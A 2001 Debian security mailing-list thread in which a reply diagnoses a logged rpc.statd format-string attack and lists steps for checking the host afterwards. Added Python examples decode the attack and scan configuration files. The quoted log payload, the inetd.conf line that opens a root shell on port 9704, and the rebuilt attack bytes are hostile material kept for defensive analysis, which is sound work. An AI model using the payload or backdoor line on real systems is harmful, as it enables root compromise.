
Re: strange log entry



On Thu, 24 May 2001 trev26@ihug.com.au wrote:

What you have there is someone trying to do a buffer overflow attack on
rpc.statd.  The idea is that once the buffer is blown, they will get a
chance to issue a command as root.  In the attack that was attempted on one
of the systems I was given to supervise, the last part of the garbage sent
to the buffer was:
/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

This, if it had succeeded, would have created a new line in inetd.conf
and restarted inetd.  Then they would have come in on port 9704 to a nice
root shell and done whatever they wanted to do.... probably remove that line,
edit my logs, install a root kit, and leave as quietly as possible.

Luckily this time it didn't work and left some dirty footprints as
evidence.

As stated earlier, the best way to deal with this, if you don't need rpc
services running for NFS/NIS or something similar, is to just shut
portmapper and all the other RPC services down and remove them from your
start-up scripts.  I was curious, however, so I just made sure tcp wrapper
(tcpd) covered portmapper and added portmap: ALL to my /etc/hosts.deny
file so I could gather some IP numbers via tcpd logging. I figure I should
let the networks assigned the IPs know that some of their machines are
compromised/being used for cracking.

While setting up a firewall as others have previously suggested is a dang
good idea, don't forget to use tcp wrappers also, if only for the logging.
For the security conscious, or the inexperienced, a good first step right
after first booting a machine is to type su -c "echo ALL:ALL >
/etc/hosts.deny" root. I'd do that before even connecting to the network.
Later, if you must, you can relax it a bit, but it's a good place to start.

However, now that you have seen this one attack, you should probably go
over your logs and system accounting files with a fine-tooth comb and see
if anyone else might have succeeded before or after ;)

This is a far from exhaustive list, but try:
Look for any breaks in your log files or unexpected daemon restarts.
Examine your crontabs to see if there are any jobs you didn't put there.
Check your /etc/passwd file for any unrecognized users or strange shells.
Check inetd.conf for any odd entries.
Run find / -mtime -N (files changed in the last N days) to look for new or
edited files. See if there are any there that you don't remember editing.
Look for changed permissions too.
Download a rootkit detector and see if anyone has already left you a
present.

again this is just the start ;)

I apologize to folks who consider this all old news, but trevs was brave
enough to admit he didn't know, so there are probably a few others lurking
in the same boat ;)

Good luck!

   David.
> Heya :)
>
> I was running a 'tail -f' on my /var/log/messages and this entry appeared while
> I was connected to the internet:
>
> May 24 10:08:11 noogies -- MARK --
> May 24 10:20:34 noogies
> May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> May 24 10:20:34 noogies
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
>
> and it has me worried it may be a security issue. I'm very new to linux, and
> newer again to debian, and at this stage I really don't have a clue as to what
> the above log entry is trying to tell me...
>
> Any input or comments would be very appreciated :)
>
> Thank you
>
> - trevs
>
>
>
> --
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>
>
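The rpc.statd entry quoted above, worked through as an added example (this is not code from either message in the thread). The interesting part of the line is not the NOP sled but the "%8x...%236x%n%137x%n%10x%n%192x%n" chain: a printf-style %n stores the number of characters printed so far into a pointer taken off the stack, so the attacker supplies the target stack addresses up front (the ^X÷ÿ¿ groups are the little-endian bytes of 0xbffff718 and its neighbours), pops stack words with %8x, then pads with %Nx so that each %n stores one chosen byte. The script below rebuilds the raw bytes syslog received (sled and shellcode shortened, values taken from the quoted line), replays the output counter and recovers the 32-bit value the four writes assemble. Two things are assumptions of the example rather than statements from the thread: that rpc.statd put the fixed text "gethostbyname error for " in front of the name before the whole string reached syslog as a format (the prefix is counted by %n), and that the four %n land on the four distinct addresses in ascending order.

```python
import re

# Constructed sample: the quoted entry rebuilt as the bytes syslog received.
# syslog printed 0x18 as ^X, the bytes f7 ff bf as the Latin-1 text "÷ÿ¿"
# and 0x90 as "\220". Sled and shellcode are shortened.
PREFIX = b"gethostbyname error for "   # assumed fixed text rpc.statd logs before the name
SAMPLE_ATTACK = (
    PREFIX
    + b"\x18\xf7\xff\xbf" * 2 + b"\x19\xf7\xff\xbf" * 2   # 0xbffff718, 0xbffff719 ...
    + b"\x1a\xf7\xff\xbf" * 2 + b"\x1b\xf7\xff\xbf" * 2   # ... 0xbffff71a, 0xbffff71b
    + b"%8x" * 9 + b"%236x%n%137x%n%10x%n%192x%n"         # pop words, then four 1-byte writes
    + b"\x90" * 40                                        # NOP sled
    + b"\xc7\x06/bin\xc7\x46\x04/sh"                      # start of the /bin/sh shellcode
)
SAMPLE_BENIGN = PREFIX + b"fileserver.example.net"

DIRECTIVE = re.compile(rb"%(\d*)([xn])")


def analyze(entry: bytes) -> dict:
    """Score one rpc.statd log message and, if it carries a %n chain, replay it."""
    message = entry[len(PREFIX):] if entry.startswith(PREFIX) else entry
    prefix_len = len(entry) - len(message)

    # Addresses placed in front of the first directive: the stack words the
    # %n writes will target.
    first_pct = message.find(b"%")
    addr_block = message[:first_pct] if first_pct > 0 else b""
    targets = sorted({int.from_bytes(addr_block[i:i + 4], "little")
                      for i in range(0, len(addr_block) - len(addr_block) % 4, 4)})

    # Replay printf's output counter. %n stores the characters emitted so far;
    # with one-byte-apart targets only the low byte of each store matters.
    # Each %x consumes an unknown 32-bit stack word; assume it prints 8 hex
    # digits, so its output length is max(width, 8).
    count = prefix_len + len(addr_block)
    writes = []
    for m in DIRECTIVE.finditer(message):
        width = int(m.group(1) or b"0")
        if m.group(2) == b"x":
            count += max(width, 8)
        else:
            writes.append(count & 0xFF)

    # Assumption of this example: the four %n hit the four distinct targets in
    # ascending order (the exploit lists each address twice for slack).
    pairs = list(zip(targets, writes))
    written_value = (int.from_bytes(bytes(writes), "little")
                     if len(writes) == 4 else None)

    nop_sled = max((len(m.group()) for m in re.finditer(rb"\x90+", message)), default=0)
    shell_strings = b"/bin" in message and b"/sh" in message

    return {
        "percent_n": len(writes),
        "targets": targets,
        "writes": pairs,
        "written_value": written_value,
        "nop_sled": nop_sled,
        "shell_strings": shell_strings,
        "suspicious": bool(writes) or nop_sled >= 16 or shell_strings,
    }


if __name__ == "__main__":
    for label, sample in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        r = analyze(sample)
        print(label, "suspicious" if r["suspicious"] else "ok")
        for addr, value in r["writes"]:
            print("  %%n stores 0x%02x at 0x%08x" % (value, addr))
        if r["written_value"] is not None:
            print("  assembled value: 0x%08x" % r["written_value"])
```

Under those assumptions the counter reaches 364, 501, 511 and 703 at the four %n, so the bytes 6c f5 ff bf are stored at 0xbffff718..0xbffff71b, i.e. the word at 0xbffff718 becomes 0xbffff56c: a stack address a few hundred bytes below the targets, which is what a pointer into the NOP sled looks like. Any %n in a hostname a daemon logs is grounds to treat the host as under attack; the sled and the /bin /sh fragments just confirm it.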
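The post-incident checklist in the reply (inetd.conf, /etc/passwd, find -mtime and permissions), as an added example that is not from the thread: small Python sweeps over constructed sample files, including the 9704 backdoor line the attack tried to append, plus a stand-in directory tree built in a temporary directory so the find-style walk runs offline. The sample accounts, the known-shell list standing in for /etc/shells and the file names are assumptions of the example.

```python
import os
import stat
import tempfile
import time

# Constructed samples. The 9704 line is the backdoor quoted in the thread.
SAMPLE_INETD = """\
# /etc/inetd.conf (constructed)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
9704 stream tcp nowait root /bin/sh sh -i
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
trevs:x:1000:1000:Trev:/home/trevs:/bin/bash
toor:x:0:0::/:/bin/bash
ftp:x:1001:1001::/home/ftp:/usr/local/bin/xsh
guest::1002:1002::/home/guest:/bin/bash
"""
SHELL_PROGRAMS = {"/bin/sh", "/bin/bash", "sh", "bash"}
KNOWN_SHELLS = {"/bin/sh", "/bin/bash", "/bin/false", "/usr/sbin/nologin"}  # assumed /etc/shells


def suspicious_inetd_lines(text):
    """(line, reason) for entries that hand a client a shell or bind a bare port as root."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:          # service socket proto wait user server [args]
            continue
        service, user, server, args = fields[0], fields[4], fields[5], fields[6:]
        if server in SHELL_PROGRAMS or any(a in SHELL_PROGRAMS for a in args):
            hits.append((line, "server program is a shell"))
        elif service.isdigit() and user == "root":
            hits.append((line, "numeric service name running as root"))
    return hits


def suspicious_passwd_entries(text):
    """(account, reason) for extra uid-0 users, empty password fields, unknown shells."""
    hits = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7:
            continue
        name, pw, uid, shell = f[0], f[1], f[2], f[6]
        if uid == "0" and name != "root":
            hits.append((name, "uid 0 but not root"))
        if pw == "":
            hits.append((name, "empty password field"))
        if shell not in KNOWN_SHELLS:
            hits.append((name, "unrecognized shell " + shell))
    return hits


def recently_modified(root, days, now=None):
    """Like `find root -mtime -days`, plus the -perm checks find would need separately.
    Returns sorted (relative path, [reasons]) for regular files only."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = []
            if st.st_mtime >= cutoff:
                reasons.append("modified in last %d days" % days)
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                reasons.append("setuid/setgid")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if reasons:
                found.append((os.path.relpath(path, root), reasons))
    return sorted(found)


def build_sample_tree():
    """Constructed stand-in for /: a month-old binary, a freshly edited inetd.conf
    and a month-old world-writable dotfile in tmp."""
    root = tempfile.mkdtemp(prefix="triage-")
    month_ago = time.time() - 30 * 86400
    for name, mode, mtime in (("bin/ls", 0o755, month_ago),
                              ("etc/inetd.conf", 0o644, None),
                              ("tmp/.x", 0o666, month_ago)):
        path = os.path.join(root, name)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(name)
        os.chmod(path, mode)
        if mtime is not None:
            os.utime(path, (mtime, mtime))
    return root


if __name__ == "__main__":
    for hit in suspicious_inetd_lines(SAMPLE_INETD) + suspicious_passwd_entries(SAMPLE_PASSWD):
        print("config:", hit)
    for path, reasons in recently_modified(build_sample_tree(), 7):
        print("fs:", path, ", ".join(reasons))
```

On a real box, point the three functions at /etc/inetd.conf, /etc/passwd and / (and keep in mind that an intruder who got root can reset mtimes and edit these files, which is why the reply's last item, a rootkit detector that compares against known-good checksums, is the one that catches what these sweeps miss).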


